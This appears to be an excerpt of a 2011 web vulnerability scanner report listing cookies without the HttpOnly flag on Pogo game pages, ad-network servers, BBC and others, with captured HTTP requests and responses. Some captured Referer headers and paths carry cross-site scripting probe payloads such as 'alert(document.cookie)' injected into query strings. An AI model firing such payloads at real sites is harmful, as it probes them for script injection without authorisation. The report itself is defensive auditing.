B2=83xP08y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0u3F8y8ysF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0u3F00358y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP08y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F8y8ysF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F00358y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 01:34:53 GMT
Connection: close
Content-Length: 0

10.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 01:34:09 GMT
Connection: close
Content-Length: 1864

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.35. http://card-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=5CA8BC1EE74B1F0277527A2DFCBA98BA.000080; Domain=.pogo.com; Path=/
com.pogo.unid=6606260996807036; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.36. http://card-games.pogo.com/games/cribbage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/games/cribbage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=D6065BE700357567D81FA6325202FBAB.000289; Domain=.pogo.com; Path=/
com.pogo.unid=6606449975376793; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/cribbage HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.37. http://card-games.pogo.com/games/rainy-day-spider-solitaire previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/games/rainy-day-spider-solitaire

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=E00D1123E11EC01BCF283E18C15DAA77.000289; Domain=.pogo.com; Path=/
com.pogo.unid=6606449975376790; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:35 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/rainy-day-spider-solitaire HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.38. http://click.linksynergy.com/fs-bin/stat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/stat

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsn_statp=FAJFJR4AAAAW5BfG5xryCg%3D%3D; Domain=.linksynergy.com; Expires=Sat, 04-Jan-2031 02:07:10 GMT; Path=/
lsn_qstring=FLenzF8lvbI%3A146261%3A; Domain=.linksynergy.com; Expires=Mon, 10-Jan-2011 02:07:10 GMT; Path=/
lsn_track=UmFuZG9tSVZz%2FLfL%2BfxkMJigkTOgxt3zHfLpNpk0lNFQF8gd%2BQ2vXz0pvncGUWzpoj69n%2Ber3qdc06h0wR6%2F3g%3D%3D; Domain=.linksynergy.com; Expires=Wed, 06-Jan-2021 02:07:10 GMT; Path=/
lsclick_mid13508="2011-01-09 02:07:10.379|FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg"; Domain=.linksynergy.com; Expires=Tue, 08-Jan-2013 02:07:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.39. http://clubpogo-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clubpogo-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=0C60C5F9106BE47764E124E1F5A58B30.000385; Domain=.pogo.com; Path=/
com.pogo.unid=6606437090669254; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.40. http://flash-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://flash-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=DD9ECB5481B20153BB68707C5F4897F5.000067; Domain=.pogo.com; Path=/
com.pogo.unid=6606527284785334; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:14:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: flash-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.41. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6670-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject.com
csi15=3188204.js^1^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239

Response

10.42. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6670-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ruid=154d290e46adc1d6f373dd09^2^1294537835^2915161843; expires=Sat, 09-Apr-2011 01:50:35 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
rdk=4252/4762; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=108564; path=/; domain=.rubiconproject.com
csi15=3188204.js^2^1294536315^1294537835; expires=Sun, 16-Jan-2011 01:50:35 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.43. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6942-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ruid=154d290e46adc1d6f373dd09^3^1294539219^2915161843; expires=Sat, 09-Apr-2011 02:13:39 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
rdk=4252/4762; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=4762^4; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=107180; path=/; domain=.rubiconproject.com
csi15=3188204.js^3^1294536315^1294539219; expires=Sun, 16-Jan-2011 02:13:39 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.44. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6942-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=4252/4762; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=109892; path=/; domain=.rubiconproject.com
csi2=3146355.js^1^1294536507^1294536507; expires=Sun, 16-Jan-2011 01:28:27 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4252/4762/6942-2.js?cb=0.9012418461497873 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/%3Frefid%3Dheadernav_fp_shopmenu
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; ses15=4762^2; csi15=3188204.js^1^1294536315^1294536315; rpb=4210%3D1%264214%3D1; put_1197=3271971346728586924; cd=false

Response

10.45. http://puzzle-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=1A57DDA503E2C81056979F24457357BF.000128; Domain=.pogo.com; Path=/
com.pogo.unid=6606230932049839; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:46 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.46. http://puzzle-games.pogo.com/games/bejeweled2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/games/bejeweled2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=EADAF0FD3218310E1CEEBA781854D80D.000146; Domain=.pogo.com; Path=/
com.pogo.unid=6606570234467613; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:50 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/bejeweled2 HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.47. http://puzzle-games.pogo.com/games/yahtzee-party previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/games/yahtzee-party

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=E4AF788ED2AA6227ABE9A8C3F56D31D0.000290; Domain=.pogo.com; Path=/
com.pogo.unid=6606518694853812; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/yahtzee-party HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.48. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:25:52 GMT
Connection: close

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=7843127134443299479&fpid=&nu=n&t=&
...[SNIP]...

10.49. http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=3yRKNJpwIg02FlBCdbdRZA7gHw8jGHgsjhADgaUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/
52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click
0846642328=_4d290f90,0846642328,758630^906164^1^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BUBFp0kAAAAAHb4CAEAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
BASE=YnQIx9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WF!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
ROLL=v5Q2Q0cRVUyqcZa/vGc3WhvkMxIiWOS7HgfCaOA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/
72318651=_4d291415,1206372681,755399^944664^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
F1=BA5Dp0EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.52. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=wPRKNJpwIg02FtBCdbdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
F1=BA/Ep0EBAAAABAAAAIAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/
17871065=_4d2913f0,4120808867,777340^955433^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
F1=BQBFp0EBAAAABAAAAMAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/
49979532=_4d291414,0737842127,777340^949895^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.54. http://www.bbc.co.uk/news/technology-12126880 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bbc.co.uk
Path:	/news/technology-12126880

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BBC-UID=048d5239a18139fc2bddb11a61903f97169352767050f19f02f9f6849e4a283c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk;
BBC-UID=048d5239a18139fc2bddb11a61903f97169352767050f19f02f9f6849e4a283c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/technology-12126880 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.55. http://www.e00.peanutlabs.com/IMG/parent_company.logo_url_medium.80x200.1.1248929690.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/IMG/parent_company.logo_url_medium.80x200.1.1248929690.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AWSELB=052955471CE77557C5059B093FDB80564CA14D6917E97B67B5A5E4D3EB1494CA107BC4756C9D1E7917A75869111F0EAA4A056867F2254F716FAB6B9BD336486E7AB4FDD4D1;MAX-AGE=600

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /IMG/parent_company.logo_url_medium.80x200.1.1248929690.jpg HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
